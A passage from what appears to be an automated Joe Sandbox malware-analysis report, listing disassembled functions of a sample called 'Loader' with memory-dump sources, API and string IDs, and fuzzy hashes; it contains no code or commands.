                                                                                        Function 0042B4D0 Relevance: 1.7, Strings: 1, Instructions: 408COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "
                                                                                        • API String ID: 0-123907689
                                                                                        • Opcode ID: 91379af672f1dbe31fa7d13f69b6f352546ad0d77617e07e08176a71aae7ab56
                                                                                        • Instruction ID: 5488062bd572d25524ecec9402af32519797fcb3431be29340e35f15c478a4d7
                                                                                        • Opcode Fuzzy Hash: 91379af672f1dbe31fa7d13f69b6f352546ad0d77617e07e08176a71aae7ab56
                                                                                        • Instruction Fuzzy Hash: 2FD116B2B083249FC714DE15E48076BB7EAEF84314F48856EE9998B382D738DD4487D6
                                                                                        Function 00416930 Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: <
                                                                                        • API String ID: 2994545307-4251816714
                                                                                        • Opcode ID: 9eff7890b7abb3a006f2c2d0c5a801ffc39c4971112778df707c3dff6546adfd
                                                                                        • Instruction ID: bc8ced4a158fefc9f1f828ddbeaf2a6aa2fbb25641fc4c758a13245c578b86aa
                                                                                        • Opcode Fuzzy Hash: 9eff7890b7abb3a006f2c2d0c5a801ffc39c4971112778df707c3dff6546adfd
                                                                                        • Instruction Fuzzy Hash: 15A19A766082508FD328CB24C8917BBB7D2EBCA304F1A897ED4D5D7252D738D841CB6A
                                                                                        Function 011C9255 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c6afe46916d1f3de16385360326b4e34759b009bcbef1d0834a3ae96c14b987
                                                                                        • Instruction ID: 68d9164682cad4aefab8f3bc5f6754e5bb5d720af1c77e568428de411a4f72f2
                                                                                        • Opcode Fuzzy Hash: 7c6afe46916d1f3de16385360326b4e34759b009bcbef1d0834a3ae96c14b987
                                                                                        • Instruction Fuzzy Hash: ED31B27690021DAFDB28DEBDCCC8DAEB76EEB94718F144199E91597284EB309D408B60
                                                                                        Function 00414F1E Relevance: 1.6, Strings: 1, Instructions: 336COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: rt
                                                                                        • API String ID: 0-702342736
                                                                                        • Opcode ID: 1605de470e2b15ba7f14b5bab545798554ec421646854cba13ad9437dbebe96f
                                                                                        • Instruction ID: 0dc673b11f2f29cf9410cafdc44ae5b0865e538447e6119a8d8e6fbf35fadf0c
                                                                                        • Opcode Fuzzy Hash: 1605de470e2b15ba7f14b5bab545798554ec421646854cba13ad9437dbebe96f
                                                                                        • Instruction Fuzzy Hash: DFB11676908351CBC720CF29C8807AB77E1EFC5364F198A6EE8C98B351E7349942CB56
                                                                                        Function 00405EA0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,
                                                                                        • API String ID: 0-3772416878
                                                                                        • Opcode ID: 697b2ba8bb72cb3d0de071efa58bd3f0d967c93cefef912759de0d6da7d3f539
                                                                                        • Instruction ID: a478b9cc30ed764529248bf8faf02e780253ee7d6c10264c25d16e611a95a898
                                                                                        • Opcode Fuzzy Hash: 697b2ba8bb72cb3d0de071efa58bd3f0d967c93cefef912759de0d6da7d3f539
                                                                                        • Instruction Fuzzy Hash: 98B138712097819FD321DF18C88061BFBE0AFA9704F444A6EF5D997382D635E918CBA7
                                                                                        Function 0042B980 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "
                                                                                        • API String ID: 0-123907689
                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                        • Instruction ID: c4d9b42fc58f09a600c35257a89653f03652f6e6775d652d055d3af208aaf9ad
                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                        • Instruction Fuzzy Hash: 6671D332B083254BD724CE29E48032BBBE2EBC5710F99C52FE4949B395D7389D4587CA
                                                                                        Function 0041B360 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: _
                                                                                        • API String ID: 0-701932520
                                                                                        • Opcode ID: ee4ac179044c3f7383c156140ccdd89d0e3231ce0658b60971308e5cd19b2ba5
                                                                                        • Instruction ID: 91adedf6748a9dca2f1a78b1e507b8d61ea5c2b795734500ece8cd71c55922e5
                                                                                        • Opcode Fuzzy Hash: ee4ac179044c3f7383c156140ccdd89d0e3231ce0658b60971308e5cd19b2ba5
                                                                                        • Instruction Fuzzy Hash: C271F85520469149D72CDF748893337BAE69F84308B2891BFD955CFBA7FA38C1438789
                                                                                        Function 0042C2CF Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: x^T:
                                                                                        • API String ID: 0-4046853431
                                                                                        • Opcode ID: e31bfd97cdbca3c70ba9f5c1bb4fca88fd095036d1b234706b61afd3b6481d50
                                                                                        • Instruction ID: 89561afeee3bb8202773f312476c0e81b73573d3d24e9526409a401e0603a0db
                                                                                        • Opcode Fuzzy Hash: e31bfd97cdbca3c70ba9f5c1bb4fca88fd095036d1b234706b61afd3b6481d50
                                                                                        • Instruction Fuzzy Hash: 5C5128B46083A19BD321DB29D4A077BBBD1AFE7304F58885EE8C687341D6394905CB56
                                                                                        Function 00418176 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: DBCD
                                                                                        • API String ID: 2994545307-3972649111
                                                                                        • Opcode ID: 1728cb6a1d738985eb9129bf996d7e92726b74752c28ad5bffaaaafca00f85d9
                                                                                        • Instruction ID: 244c48801a6beffa120859c347b683f921f31d654a72ffce60c91e75d6a5c392
                                                                                        • Opcode Fuzzy Hash: 1728cb6a1d738985eb9129bf996d7e92726b74752c28ad5bffaaaafca00f85d9
                                                                                        • Instruction Fuzzy Hash: 9D513C366182118FD7248B28CC11BEBB7D2FBC5714F19453DC9D9D3292DB359842CB89
                                                                                        Function 00409AC1 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: <=
                                                                                        • API String ID: 0-1782720273
                                                                                        • Opcode ID: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
                                                                                        • Instruction ID: c36e57fc54e8ebb91c1d5de0612bd1b6b956f574d134e83768c4160145cd7853
                                                                                        • Opcode Fuzzy Hash: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
                                                                                        • Instruction Fuzzy Hash: 8A5139B6E513684BDB14CFB9D8812DEBA32FB89310F0982A9D844B7344E7348D458FC5
                                                                                        Function 0040ECE0 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: H
                                                                                        • API String ID: 0-2852464175
                                                                                        • Opcode ID: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
                                                                                        • Instruction ID: b490a7b8e69dba0a299ff7ef51fd341b042986cf65b0f910d3ddf594bd78af48
                                                                                        • Opcode Fuzzy Hash: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
                                                                                        • Instruction Fuzzy Hash: DF51CF3260C3908BD7259B3984912EFBBE5ABC6310F194E3EE4D9973C2D6388542D787
                                                                                        Function 0043D450 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ul
                                                                                        • API String ID: 0-4068291676
                                                                                        • Opcode ID: 09d47b0d80f7065e4a3fffddd9f75c44f89de03e5ddc334a4cab4097f41f42d0
                                                                                        • Instruction ID: 162c06210579af30b91d2e802b6b39d5a7fb57fbd88dc5fca12273f2b30ca4e7
                                                                                        • Opcode Fuzzy Hash: 09d47b0d80f7065e4a3fffddd9f75c44f89de03e5ddc334a4cab4097f41f42d0
                                                                                        • Instruction Fuzzy Hash: 66316032B086501BC70CDA2888A257BB7E29BDE319F19D13ED895C73D2D538DD068744
                                                                                        Function 00429170 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: A%&'
                                                                                        • API String ID: 0-1522422272
                                                                                        • Opcode ID: 184964f8b652324f2e113d025011fc4e3a587f1cbb9a8a3454d8662ee6523bd1
                                                                                        • Instruction ID: 913c420f85954eed9bd1d458c10467abd4bf7e3dae9106fcd3ab7ebdbb23f432
                                                                                        • Opcode Fuzzy Hash: 184964f8b652324f2e113d025011fc4e3a587f1cbb9a8a3454d8662ee6523bd1
                                                                                        • Instruction Fuzzy Hash: CC2109B12483185FE718DF249C56B6FB7A1EB82300F05882CE5858B1C6D678D509C746
                                                                                        Function 0041C08C Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: I
                                                                                        • API String ID: 0-3707901625
                                                                                        • Opcode ID: 73cf703926595eb476ccce4fa146147637d9604b7af4a04b8eb6030e6fa27180
                                                                                        • Instruction ID: 25dd5030608d8804b3685d06091bb182962033f97911b4a3b6b195a09c05bc12
                                                                                        • Opcode Fuzzy Hash: 73cf703926595eb476ccce4fa146147637d9604b7af4a04b8eb6030e6fa27180
                                                                                        • Instruction Fuzzy Hash: 5221D532A583518BC3148E68C89139BFBE15BD2314F1D9A7ED4D197291C77C88498B86
                                                                                        Function 0043D010 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: C5pq
                                                                                        • API String ID: 0-2188916712
                                                                                        • Opcode ID: fd3e314f0704b203d822c73d32aed4de58c5baba185771a5c6d4afa7d99d76f6
                                                                                        • Instruction ID: 0d2a52dac7bd84c95214030ab6d11c0dae6afcb66c194cb9d7a8b764e771bff1
                                                                                        • Opcode Fuzzy Hash: fd3e314f0704b203d822c73d32aed4de58c5baba185771a5c6d4afa7d99d76f6
                                                                                        • Instruction Fuzzy Hash: CAF04670D1E2509FE30CCF30890246777A9EFC7644F28C43CE88287356EA30C922DA68
                                                                                        Function 00402EE0 Relevance: .7, Instructions: 696COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1a0ec2540cbe78e3f2d196b18f0b566b8230c2f421c0fd3a94d20e5d8c3bdc5d
                                                                                        • Instruction ID: 6f3f6e217fa160ce5c47ac3ba8c29444a77df25c16127400011b9c3fcb335d97
                                                                                        • Opcode Fuzzy Hash: 1a0ec2540cbe78e3f2d196b18f0b566b8230c2f421c0fd3a94d20e5d8c3bdc5d
                                                                                        • Instruction Fuzzy Hash: 5452E2315083459FCB14CF14C0806AABFE5FF89305F198A7EE89967381D778EA49CB89
                                                                                        Function 0041FA10 Relevance: .7, Instructions: 678COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7e26fba6300a6f083d24a2d55453f94dae9ea5b7036511e397063f69fb604f91
                                                                                        • Instruction ID: 6155c681720684765bf75e9c0fb17a89b40920418519336270cef116b5653186
                                                                                        • Opcode Fuzzy Hash: 7e26fba6300a6f083d24a2d55453f94dae9ea5b7036511e397063f69fb604f91
                                                                                        • Instruction Fuzzy Hash: 4D626CB0609B808ED325CF3C8815797BFE5AB5A324F148A5DE0FA873D2C7756005CB6A
                                                                                        Function 004066D0 Relevance: .7, Instructions: 665COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e69e8a2abeca99dc1e1ab3989addb63fe830d766578d31c350296b713837ee4c
                                                                                        • Instruction ID: 3029a9d5e0e7f722953d515f50b156050abe03212a902a226f49a86632ee3869
                                                                                        • Opcode Fuzzy Hash: e69e8a2abeca99dc1e1ab3989addb63fe830d766578d31c350296b713837ee4c
                                                                                        • Instruction Fuzzy Hash: 0352D1B0A08B948FE730DB24C4843A7BBE1EB51314F15893ED5EB167C2C37DA995871A
                                                                                        Function 004074A0 Relevance: .6, Instructions: 614COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
                                                                                        • Instruction ID: f7c506ca0572c78bb64cf85289b63f361dc8afc3a54a3446179c7f90162a8508
                                                                                        • Opcode Fuzzy Hash: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
                                                                                        • Instruction Fuzzy Hash: E212A532A0C7118BD724DF18D8816ABB3E2FFD4305F19893ED586A7381D678B855CB86
                                                                                        Function 00403920 Relevance: .6, Instructions: 600COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c96ca6233cc43be927f0f203a80893cad1019c4eb3e696bf00876446c9158cdd
                                                                                        • Instruction ID: d7bcbc88bdf6cfba9bdc99fa284d67c403e95a1d0c78040340162460b82664a7
                                                                                        • Opcode Fuzzy Hash: c96ca6233cc43be927f0f203a80893cad1019c4eb3e696bf00876446c9158cdd
                                                                                        • Instruction Fuzzy Hash: C0322470A14B118FC338CF29C680526BBF5BF45711B604A2ED6A7A7B90D73AF945CB18
                                                                                        Function 00438630 Relevance: .6, Instructions: 563COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
